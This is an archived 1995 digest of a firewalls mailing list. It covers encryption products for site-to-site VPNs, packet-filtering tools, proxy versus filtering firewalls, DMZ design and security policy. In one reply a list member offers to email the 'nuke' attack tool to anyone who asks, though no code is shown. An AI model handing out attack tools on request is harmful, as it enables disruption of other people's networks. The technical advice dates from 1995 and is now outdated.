Received: from smiley.sit (smiley.mitre.org [128.29.140.20]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id JAA27654 for ; Wed, 3 May 1995 09:06:13 -0400 Received: from [128.29.140.130] (mckenney-mac) by smiley.sit (4.1/SMI-4.1) id AA29022; Wed, 3 May 95 09:05:04 EDT Date: Wed, 3 May 95 09:05:03 EDT Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: mckenney@smiley.mitre.org (Brian W. McKenney) Subject: Firewall-to-Firewall Encryption Products Cc: mckenney@smiley.mitre.org Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The following products are able to encrypt network traffic based on source/destination address. Some are also able to encrypt based on the type of network service (port). As a result, sites could create a Virtual Private Network on the Internet. I will post more details on my survey soon to this list. I just want to know if there are other commercially available products that provide similar functionality. Note that one would need two boxes in order to provide for site-to-site encryption over the Internet. Products are: ANS InterLock Service - Supports optional DES software. Milkyway Black Hole - Supports modified (proprietary) DES algorithm (DES++). Cisco Systems/Cylink - Software solution (part of Cisco operating system) later this calendar year, hardware board to follow. Hughes NetLOCK - Supports DES and cXOR. IRE - Available later this calendar year. KarlBrouter - Supports software DES. Network Systems Corp. (NSC) - Security Router offers encryption using IDEA, DES, Triple DES, and high speed proprietary algorithms. Morningstar EXPRESS Router - Supports DES. Motorola Network Encryption System (NES) Raptor Systems - Will be offering DES encryption package. Semaphore Communications - Network Encryption Unit (NEU), supports DES. swIPe - Publicly available. TIS Gauntlet 3.0 - Supports software DES option and hardware DES board. Includes resellers of Gauntlet. UUNET LanGuardian - Combination of hardware and software DES. ---Background Date: Wed, 1 Mar 95 09:24:56 EST Mime-Version: 1.0 To: firewalls@GreatCircle.COM From: mckenney@smiley.mitre.org (Brian W. McKenney) Subject: Firewall-to-Firewall Encryption Cc: mckenney@smiley I am looking for information on commercial off-the-shelf (COTS) encryption products that can be used to provide firewall-to-firewall encryption (node-to-node). The device would encrypt based on source/destination address and if possible by network service (port). One of our customers has a network of firewalls and they would like to protect their network traffic over the Internet (firewall-to-firewall) but still be able to communicate with the outside world. The firewall configuration is the same at each of the nodes. At the present time, a user must go through a challenge/response sequence at each firewall. The customer is exploring security technologies that could eliminate the need for a challenge/response dialogue at each firewall. Inbound connections (e.g., TELNET, FTP, dial-in) from a user that is not behind a node firewall would still be required to go through a challenge/response dialogue (strong authentication) at the firewall. Respectfully, Brian W. McKenney Mail Stop: Z-202 The MITRE Corporation 7525 Colshire Drive McLean, VA 22102 Voice: 703-883-5463 Fax: 703-883-1397 E-Mail: mckenney@mitre.org From firewalls-owner Wed May 3 07:01:11 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA25034 for firewalls-outgoing; Wed, 3 May 1995 06:11:50 -0700 Received: from Toro.Com (LYNUX35.TORO.COM [170.92.1.180]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA25027 for ; Wed, 3 May 1995 06:11:46 -0700 From: Maurice.Yergeau@Toro.Com Received: by lynux36.toro.com (Smail3.1.28.1 #3) id m0s6e6x-00024RC; Wed, 3 May 95 08:05 CDT Message-Id: Date: Wednesday, 3 May 1995 8:11am CT To: firewalls@greatcircle.com Subject: packet filtering software Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking for some software to do packet filtering that will run on a sunos box. I was told that TIS toolkit did this sort of thing but can't find it in the documentation. Does anyone know if TIS does packet filtering or of some software that does? any help is greatly appreciated. maurice.yergeau@toro.com From firewalls-owner Wed May 3 07:39:56 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA24042 for firewalls-outgoing; Wed, 3 May 1995 05:40:37 -0700 Received: from real.com (eagle.real.com [199.97.122.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA24037 for ; Wed, 3 May 1995 05:40:31 -0700 Date: Wed, 3 May 1995 08:40:24 -0400 From: bret@real.com (Bret McDanel) Received: by real.com (8.6.8.1/3.2.012693-Realistic Technologies Inc); id IAA18781 for firewalls@greatcircle.com; Wed, 3 May 1995 08:40:24 -0400 Message-Id: <199505031240.IAA18781@real.com> To: firewalls@greatcircle.com Subject: Re: nuke vs firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Thanks, but nope, taint in there. Done got one copy of nuke.c > but there usually be several versions of these critters hacked to varying > extents, so that some are more useful than others. Still looking. > > Come on you CERT and CIAC and DISA d00dz, where can I find nuke? > I emailed you nuke seperatly (dont think that Brent will take to kindly to the code being posted to his list :) If anyone else wants it, drop me a line, and I'll send it out.. And because some people dont know, you need root to run nuke (it opens a raw socket).. From firewalls-owner Wed May 3 07:49:32 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA24105 for firewalls-outgoing; Wed, 3 May 1995 05:43:15 -0700 Received: from uu10.psi.com (uu10.psi.com [38.8.4.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA24100 for ; Wed, 3 May 1995 05:43:11 -0700 Received: from po.gis.prc.com by uu10.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA00503 for Firewalls@greatcircle.com; Wed, 3 May 95 08:43:29 -0400 Message-Id: Date: 3 May 1995 08:41:29 -0500 From: "Heiser Jay" Subject: Proxy vs filtering: Where's the beef? To: Firewalls@greatcircle.com X-Mailer: Mail*Link SMTP/MS 3.0.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Every single firewall digest includes the ongoing religious argument about filtering routers vs. proxy servers. Where's the evidence that either is less secure than the other? Around & around we go with "My firewall's better than your firewall!" (set to music, if you're old enough to remember 60's TV commercials ;-) but I don't see any evidence beyond vague theoretical arguments. Which firewalls are breaking right now? What products and technologies are not making it? What is being succesfully hacked right now as we read this? From firewalls-owner Wed May 3 08:08:09 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA25636 for firewalls-outgoing; Wed, 3 May 1995 06:34:30 -0700 Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA25631 for ; Wed, 3 May 1995 06:34:27 -0700 Received: from relay.tis.com by relay4.UU.NET with SMTP id QQyoda10870; Wed, 3 May 1995 09:34:47 -0400 Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0) id sma011818; Wed, 3 May 95 09:32:51 -0400 Received: from sol.tis.com by tis.com (4.1/SUN-5.64) id AA14310; Wed, 3 May 95 09:33:26 EDT Message-Id: <9505031333.AA14310@tis.com> To: bwern@jax.jaxnet.com, Firewalls@greatcircle.com From: Frederick M Avolio Subject: Re: Help with begining options? In-Reply-To: <199505020700.DAA27248@jax.jaxnet.com> Tue, 2 May 1995 03:00:55 -0400 Date: Wed, 03 May 95 09:33:25 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk 1. If you won't get money for it, don't do it. Security is too important. You need to establish that there is a business requirement for your company to connect up to the Internet. THen you need to establish what the risks are. The cost model should show that it is worth spending money to protect your assets or it will show that you don't need an Internet connection enough to justify the cost. The middle ground of "scrimping" does not belong in the equation. 2. No "sacrificial lamb" systems. Any system on the DMZ has to be protected as well as the firewall. Why? Because I have never yet met someone in business who was willing to have any of their systems broken into. Reasons: 1) The report in the NY Times will just say you were hacked, not that it was a sacrificial system (or if it does, it'll say it somewhere 10 pages into the paper); 2) your sacrificial lamb system will be used as a jump off point to launch attacks against MIT or against some elementary school in Arizona or against whitehouse.gov; 3) your lamb will be used as a storage point for recipes for bombs or for kiddie porn; and 4) the term "sacrificial" you will find pertains to you and your job, not the system :-). Fred From firewalls-owner Wed May 3 08:23:02 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA26709 for firewalls-outgoing; Wed, 3 May 1995 07:08:45 -0700 Received: from oxygen.house.gov (oxygen.house.gov [137.18.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA26702 for ; Wed, 3 May 1995 07:08:38 -0700 Received: by oxygen.house.gov (AIX 3.2/UCB 5.64/3.2.083191-) id AA05453; Wed, 3 May 1995 10:08:05 -0400 Date: Wed, 3 May 1995 10:08:05 -0400 From: johns@oxygen.house.gov (John Schnizlein) Message-Id: <9505031408.AA05453@oxygen.house.gov> To: Firewalls@GreatCircle.COM, janb@olymp.fer.uni-lj.si Subject: Re: Screened subnet with one router? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Is there any difference in the security of a screened subnet firewall > using two routers (one serial-ethernet, the second ethernet-ethernet) > opposed to using one router with serial-ethernet-ethernet interfaces? > > --------------------------------------------------------------------- > > First design: > > -- DMZ -- > Internet -->|R1|-------------|R2|----- inside net > -- bastion -- > host > > --------------------------------------------------------------------- > > The second one: > > -- > Internet -->|R1|------- inside net > -- > b. | > host |DMZ > | > - One advantage of the first design is that you may need/want to have different routing policies, in addition to different packet filtering, in R1 than R2. A disadvantage is that, if the bastion is subverted, it is in the best place to sniff all your Internet traffic. This is not true of the second design. With the second design you will have more than one internal interface, so preventing source address spoofing will require the screen on incoming packets, which Cisco (e.g.) software, only supports in more recent versions. -- John From firewalls-owner Wed May 3 09:23:29 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA28405 for firewalls-outgoing; Wed, 3 May 1995 08:01:17 -0700 Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA28400 for ; Wed, 3 May 1995 08:01:12 -0700 Received: from rssi by relay1.UU.NET with SMTP id QQyodg22212; Wed, 3 May 1995 11:01:16 -0400 Received: from pail.rssi.com by rssi (4.1/SMI-4.1) id AA15117; Wed, 3 May 95 10:58:52 EDT Received: by pail.rssi.com (5.0/SMI-SVR4) id AA05969; Wed, 3 May 1995 11:00:18 +0500 Date: Wed, 3 May 1995 11:00:18 +0500 From: bvvanor@rssi.rssi.com (Brad VanOrden) Message-Id: <9505031500.AA05969@pail.rssi.com> To: firewalls@greatcircle.com Cc: casares@ix.netcom.com, guido@kitty.lss.cp.philips.com, mark@mentat.com, mckenney@smiley.mitre.org, py4@dspy4.dsrd.ornl.gov Subject: RE: IP Encryption - Wang TIU Content-Length: 325 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In response to all the requests, here is the POC info for the WANG Trusted Interface Unit (TIU): Sales: A. Ann Horton 301-657-5267 Engineer: Bill O'Neil 617-967-1439 I'm sorry I don't have any of the specs with me, but it is certified by NSA for TS/SCI level. Hope this helps! Brad Van Orden Rapid Systems Solutions From firewalls-owner Wed May 3 10:08:49 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA28248 for firewalls-outgoing; Wed, 3 May 1995 07:58:42 -0700 Received: from aruba.lerc.nasa.gov (aruba.lerc.nasa.gov [139.88.35.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA28242 for ; Wed, 3 May 1995 07:58:39 -0700 Received: from brahams.lerc.nasa.gov by aruba.lerc.nasa.gov with SMTP (950215.SGI.8.6.10/LeRC/DLW/TAF(1.24-main)) id KAA28396; Wed, 3 May 1995 10:59:03 -0400 Received: by brahams.lerc.nasa.gov (5.x/LeRC/DLW/TAF(1.23-local)) id AA13810; Wed, 3 May 1995 10:58:58 -0400 Date: Wed, 3 May 1995 10:58:57 -0400 (EDT) From: vick To: "Brian W. McKenney" Cc: firewalls@GreatCircle.COM, mckenney@smiley.mitre.org Subject: Re: Firewall-to-Firewall Encryption Products In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As a follow on to the initial request... Will any of these OTS technologies handle video conferencing? That is: encrypting the video/audio from one node to another v On Wed, 3 May 1995, Brian W. McKenney wrote: > > The following products are able to encrypt network traffic based on > source/destination address. Some are also able to encrypt based on the > type of network service (port). As a result, sites could create a Virtual > Private Network on the Internet. I will post more details on my survey > soon to this list. I just want to know if there are other commercially > available products that provide similar functionality. Note that one would > need two boxes in order to provide for site-to-site encryption over the > Internet. > > Products are: > > ANS InterLock Service > - Supports optional DES software. > > Milkyway Black Hole > - Supports modified (proprietary) DES algorithm (DES++). > > Cisco Systems/Cylink > - Software solution (part of Cisco operating system) later this > calendar year, hardware board to follow. > > Hughes NetLOCK > - Supports DES and cXOR. > > IRE > - Available later this calendar year. > > KarlBrouter > - Supports software DES. > > Network Systems Corp. (NSC) > - Security Router offers encryption using IDEA, DES, Triple DES, > and high speed proprietary algorithms. > > Morningstar EXPRESS Router > - Supports DES. > > Motorola Network Encryption System (NES) > > Raptor Systems > - Will be offering DES encryption package. > > Semaphore Communications > - Network Encryption Unit (NEU), supports DES. > > swIPe > - Publicly available. > > TIS Gauntlet 3.0 > - Supports software DES option and hardware DES board. > Includes resellers of Gauntlet. > > UUNET LanGuardian > - Combination of hardware and software DES. > > > ---Background > > Date: Wed, 1 Mar 95 09:24:56 EST > Mime-Version: 1.0 > To: firewalls@GreatCircle.COM > From: mckenney@smiley.mitre.org (Brian W. McKenney) > Subject: Firewall-to-Firewall Encryption > Cc: mckenney@smiley > > I am looking for information on commercial off-the-shelf (COTS) encryption > products that can be used to provide firewall-to-firewall encryption > (node-to-node). The device would encrypt based on source/destination > address and if possible by network service (port). > > One of our customers has a network of firewalls and they would like to > protect their network traffic over the Internet (firewall-to-firewall) but > still be able to communicate with the outside world. The firewall > configuration is the same at each of the nodes. At the present time, a > user must go through a challenge/response sequence at each firewall. The > customer is exploring security technologies that could eliminate the need > for a challenge/response dialogue at each firewall. > > Inbound connections (e.g., TELNET, FTP, dial-in) from a user that is not > behind a node firewall would still be required to go through a > challenge/response dialogue (strong authentication) at the firewall. > > > Respectfully, > > Brian W. McKenney Mail Stop: Z-202 > The MITRE Corporation 7525 Colshire Drive > McLean, VA 22102 > > Voice: 703-883-5463 Fax: 703-883-1397 > E-Mail: mckenney@mitre.org > > > ----------------------------------------------------------------------------- Vick Kiff (RMS Technolgies, Inc.) | Unix Systems Administrator NASA Lewis Research Center | SpaceCommunications Division (SCd) 21000 Brookpark Rd | 216-433-6547 Cleveland, Ohio 44135 | email: vick@lerc.nasa.gov ----------------------------------------------------------------------------- "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart From firewalls-owner Wed May 3 10:25:33 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA00282 for firewalls-outgoing; Wed, 3 May 1995 08:53:39 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA00277 for ; Wed, 3 May 1995 08:53:32 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s6ggt-0000IyC; Wed, 3 May 95 08:50 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA15602; Wed, 3 May 1995 08:53:23 +0800 Date: Wed, 3 May 1995 08:53:23 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505031553.AA15602@brittany.oes.amdahl.com> To: alan@mid.net Subject: Re: Help with begining options? Cc: firewalls@greatcircle.com, firewall@oes.amdahl.com X-Sun-Charset: US-ASCII content-length: 2793 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > If you develop a firewalling system that allows returning packets simply on the > basis of the "ack" bit, then you are risking significant exposure. A proxy > firewall is the best solution to this, which is why I'm a big fan of TIS > and their product, which we resell. However, if you only want the 80 percent > security, then plop the money down to one of the packet filtering vendors. > > Good luck. This is misleading. I'm not going to start up with the challenge for people to come up with security holes in a packet filtering firewall that aren't in a application proxying firewall, I'll just summarize the results of last time. The concensus was that you can provide good security either way, that most people when using a packet filtering firewall would want to disallow inbound connections, and that a combination of filtering outbound, and proxying for any required inbound was nice. It used to be that packet filtering had an advantage for transparency, but that's changing. The proxying firewalls used to have an advantage that if you wanted to hide all your inbound addresses (something that we've argued to a consensus that it doesn't buy you security, MANY times;) they would let you do that. The filtering firewalls such as firewall-1 are doing this now or will soon. They also let you have the choice of passing addresses through, giving the people inside connectivity just as if they were directly connected to the internet, (they are;) while still providing security. The ftp and udp solutions offered by vendors like Checkpoint are something quite nice, allowing you to use unmodified clients and still connect to the net, but again, some of the proxy stuff is moving this way. The different types of firewalls seem to be cross pollinating, and it's harder and harder to tell them apart. To tell someone that whatever you happen to be reselling is inherently better when it's not, is understandable, but questionable. Instead you should be telling them of it's advantages without bashing the competition. It just makes you look better. Sell your services by selling them. Why does this industry look more and more like politics? Patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Wed May 3 10:38:06 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA28902 for firewalls-outgoing; Wed, 3 May 1995 08:13:16 -0700 Received: from gw.lsli.com (lsli.sccsi.com [198.65.130.22]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA28893 for ; Wed, 3 May 1995 08:13:09 -0700 Received: by gw.lsli.com (AIX 3.2/UCB 5.64/4.03) id AA16490; Wed, 3 May 1995 10:11:19 -0500 Received: by gw.lsli.com via smwrap (PORTUS 2.0) id smwrapL2gAu_; Wed May 3 10:10:28 1995 Date: Wed, 3 May 95 10:04:03 CDT From: ted@gw.lsli.com Subject: Firewall to Firewall encryption To: firewalls@greatcircle.com X-Mailer: Chameleon ARM_55, TCP/IP for Windows, NetManage Inc. Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You left LSLI's PORTUS firewall off your list. ------------------------------------- ted@gw.lsli.com Livermore Software Laboratories, Inc. Houston, Texas http://www.sccsi.com/lsli/lsli.homepage.html 05/03/95 "It was the nineties and thanks to the internet,the whole world could hear what some nerd thinks about Star Trek." - Homer Simpson ------------------------------------- From firewalls-owner Wed May 3 10:39:18 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA01336 for firewalls-outgoing; Wed, 3 May 1995 09:52:40 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA01331 for ; Wed, 3 May 1995 09:52:37 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s6hc5-0000ORC; Wed, 3 May 95 09:49 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA15679; Wed, 3 May 1995 09:52:09 +0800 Date: Wed, 3 May 1995 09:52:09 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505031652.AA15679@brittany.oes.amdahl.com> To: bwern@jax.jaxnet.com Subject: Re: Help with begining options? Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII content-length: 1249 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > My understanding is that using a filter on the ip layer (like FWTK would > provide), relied on ack packets, which could be forged. A proxy takes care > of that problem, and would allow me to allow those services to only be > originated from within the internal network, correct? A filter on the ip layer would only fall prey to ack packets being forged if other things were broken. It's well understood how to secure this. This is not a reason to choose one approach over the other. There are advantages, (though disappearing as they copy each other,) to each approach to a firewall, but either can be done securely. Patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Wed May 3 10:44:49 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA29035 for firewalls-outgoing; Wed, 3 May 1995 08:17:47 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA29025 for ; Wed, 3 May 1995 08:17:43 -0700 Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU via SMTP; Wed, 3 May 1995 11:18:08 -0400 Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-5.67b/res.client.cf-3.7) id AA01726; Wed, 3 May 1995 11:18:07 -0400 Date: Wed, 3 May 1995 11:18:07 -0400 From: long-morrow@CS.YALE.EDU (H Morrow Long) Message-Id: <199505031518.AA01726@SPARKY.CF.CS.YALE.EDU> To: Maurice.Yergeau@Toro.Com, firewalls@greatcircle.com Subject: Re: packet filtering software Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: Maurice.Yergeau@Toro.Com >Message-Id: >Date: Wednesday, 3 May 1995 8:11am CT >To: firewalls@greatcircle.com >Subject: packet filtering software > >I am looking for some software to do packet filtering that will run on a sunos >box. I was told that TIS toolkit did this sort of thing but can't find it in >the documentation. Does anyone know if TIS does packet filtering or of some >software that does? > >any help is greatly appreciated. > >maurice.yergeau@toro.com The TIS commercial Gauntlet product they sell and the freely available -- though not necessarily public domain -- FWTK (FireWall ToolKit) that they have on their anonymous FTP server (ftp.tis.com) implement a "Bastion Host running Application Gateways" firewall vs. a packet filtering (a.k.a. screening router) approach. If you want a screening router a modified 'screend' runs on SunOS (but the README file says that that port was done by Vixie Enterprises consulting and the modified SunOS kernel sources necessary to get it to run on SunOS are not distributed with the std screend package which you can get at ftp://coast.cs.purdue.edu/pub/mirrors/ftp.vix.com/screend/.) and the commercial product known as Firewall-1 from Checkpoint Technologies ( http://WWW.CheckPoint.com/ ) runs on a Sun box and can provide packet filtering (and much more that straight packet filtering). - Morrow From firewalls-owner Wed May 3 11:05:54 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA28583 for firewalls-outgoing; Wed, 3 May 1995 08:04:56 -0700 Received: from raksha.atlanta.com (raksha.atlanta.com [155.229.1.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA28562 for ; Wed, 3 May 1995 08:04:50 -0700 Received: from mjsus.atlanta.com (mjsus.atlanta.com [155.229.129.103]) by raksha.atlanta.com (8.6.9/8.6.9) with SMTP id LAA08611 for ; Wed, 3 May 1995 11:06:49 -0400 Message-Id: <199505031506.LAA08611@raksha.atlanta.com> X-Sender: mjsus@pop.atlanta.com X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 03 May 1995 10:03:23 -0400 To: firewalls@GreatCircle.COM From: mjsus@atlanta.com (Markku Saarelainen) Subject: Re: Policies Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ey missed, or to see how someone else worded a particular subject. > >A security policy is a management statement based on a thorough >analysis. You need to identify for management the vulnerabilities of >your systems and networks; their real and perceived threats; and the >available countermeasures to those threats. Once management has this >information, it can start asking: "OK, if we leave ourselves vulnerable >to this threat, what will it cost us?" "What will it cost to impliment >a countermeasure?" From then on , it is a cost-benefit decision. > My one cent worth ... I suggest that you go to the library and read the Computer Security Journal (for example, Volume X Number 2 or 1. Or you may also take a look at the COM-SAC Journals, Computer Security Auditing and Controls. Please, see the general outline (table of content) for the Information Security System Manual. For any details, please, contact directly to me ( mjsus@atlanta.com). I hope that this helped a little. Information Security System (ISS) Manual 1. Index 2. Manual Revision Log 3. Statement of Ownership and Authority 4. Scope and Applicability 5. ISS Manual Distribution List 6. Definitions of Terms 7. Information Security Policy and Objectives 8. Management Responsibility 9. Information Security System 10. Client / Customer Contract Security 11. Information Systems Design and Development 12. Document Control 13. Purchasing Information Security 14. Facility Management and Security 15. Information Systems Management 16. Information Security System Audit 17. Personnel and Employee Security 18. Legal Information Security Matters 19. Counter Information Security System Activities 20. Information Security Insurance Administration Attachment ISS Organization Chart ISS Responsibility Descriptions Code of Ethics in the Information Management Confidentiality / Nondisclosure Agreement My Best Regards, Markku JS ***************************************************************** Markku J. Saarelainen Tel: U.S.A-(404)-998-7855 P.O.Box 1672 FAX: U.S.A-(404)-998-7855 Roswell, GA 30077, USA Email: mjsus@atlanta.com DISCLAIMER No thought written in this message is a statement of any organization by which I am employed or for which I work. ***************************************************************** From firewalls-owner Wed May 3 11:13:34 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA01194 for firewalls-outgoing; Wed, 3 May 1995 09:47:05 -0700 Received: from SUNED.ZOO.CS.YALE.EDU (ZOO-GW.CS.YALE.EDU [128.36.0.19]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA01189 for ; Wed, 3 May 1995 09:47:01 -0700 Received: from JAGUAR.ZOO.CS.YALE.EDU by SUNED.ZOO.CS.YALE.EDU via SMTP; Wed, 3 May 1995 12:47:04 -0400 Received: by JAGUAR.ZOO.CS.YALE.EDU (Sendmail-5.65c/res.client.cf-3.7) id AA27097; Wed, 3 May 1995 12:47:03 -0400 Date: Wed, 3 May 1995 12:47:02 -0400 (EDT) From: Ben To: Marco Polo , Matthew Elvey , firewalls@greatcircle.com Subject: Security professionals at the Pentagon (fwd) Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Who feels secure knowing that this is the case at our local government offices? Ben. ---------- Forwarded message ---------- Date: Wed, 3 May 95 08:45:20 CDT From: Mike McNally To: cypherpunks@toad.com Subject: Security professionals at the Pentagon I kinda hate to make fun of this poor guy, but I'm in one of those funny moods and I just can't help myself. I'll cross out his name as a token gesture of niceness. ====================================================================== [ from comp.unix.admin ] Hi guys... Hope you can help me out... Here is: I need as much info as possible by, tomorrow, Thursday at the latest. Our office is having a big problem with wanting to givem, the about 300-400 customers anonymous FTP. There is a big security concern. I need you to research as much as you can about a program named "chroot()". I stumbled across this in a book called "Internet ...". Mail me everything you can find out about this... Millions thanx for your help... chroot() - is suppose to be a program that restricts any outside user from accessing anything outside of the structure they are directed tol ----------------------------------------------------------------------- O O o o O ____ ____. Xxxxxx X. Xxxxxx - DISA - Pentagon Y__._|[]|_/ | XxXxXxX@selma.hq.af.mil {|__|_|__|______| AIX System Administrator (Computer Programmer) //ooo==OO-oo--oo (XXX) XXX-XXXX TTY {via VA Relay Ctr XXX-XXX-XXXX} ----------------------------------------------------------------------- -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Wed May 3 11:51:03 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA03153 for firewalls-outgoing; Wed, 3 May 1995 10:52:19 -0700 Received: from uu2.psi.com (uu2.psi.com [128.145.228.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA03139 for ; Wed, 3 May 1995 10:52:12 -0700 Received: from tc-savoy.gwl.com by uu2.psi.com (5.65b/4.0.940727-PSI/PSINet) via UUCP; id AA15400 for ; Wed, 3 May 95 13:30:42 -0400 Received: from tc-savoy.gwl.com by is-mailman.gwl.com with SMTP id AA29010 (5.65c/IDA-1.4.4 for ); Wed, 3 May 1995 09:44:04 -0600 Received: by tc-savoy.gwl.com id AA12647 (5.65c/IDA-1.4.4 for Firewalls@greatcircle.com); Wed, 3 May 1995 09:44:02 -0600 Date: Wed, 3 May 1995 09:44:02 -0600 From: Rich Brown Message-Id: <199505031544.AA12647@tc-savoy.gwl.com> To: Firewalls@greatcircle.com Subject: tacacs unix client Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings, We are looking for a tacacs client that runs on a unix system. We have the tacacs server piece and have made it work with a cisco router. However, we would like to do tacacs authentication from/to a unix system, not through the cisco router. Any information is appreciated. Thanks in advance. _______________________________________________________________________________ Rich Brown, Network Administrator Great-West Life E-mail: rabr@gwl.com 8505 E. Orchard Rd Englewood, Co 80111 Phone: 303/689-3174 _______________________________________________________________________________ From firewalls-owner Wed May 3 12:21:39 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA05466 for firewalls-outgoing; Wed, 3 May 1995 11:55:12 -0700 Received: from vtserf.cc.vt.edu (vtserf.CC.VT.EDU [128.173.4.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA05461 for ; Wed, 3 May 1995 11:55:09 -0700 From: marchany@vtserf.cc.vt.edu Received: by vtserf.cc.vt.edu (5.65/DEC-Ultrix/4.3) id AA14795; Wed, 3 May 1995 14:54:36 -0400 Message-Id: <9505031854.AA14795@vtserf.cc.vt.edu> To: casares@ix.netcom.com (michael smith) Cc: s0ujgg@pacific.fnma.com (Joseph Gerrity), firewalls@greatcircle.com, marchany@vtserf.cc.vt.edu Subject: Re: Policies In-Reply-To: Your message of "Tue, 02 May 95 15:50:50 PDT." 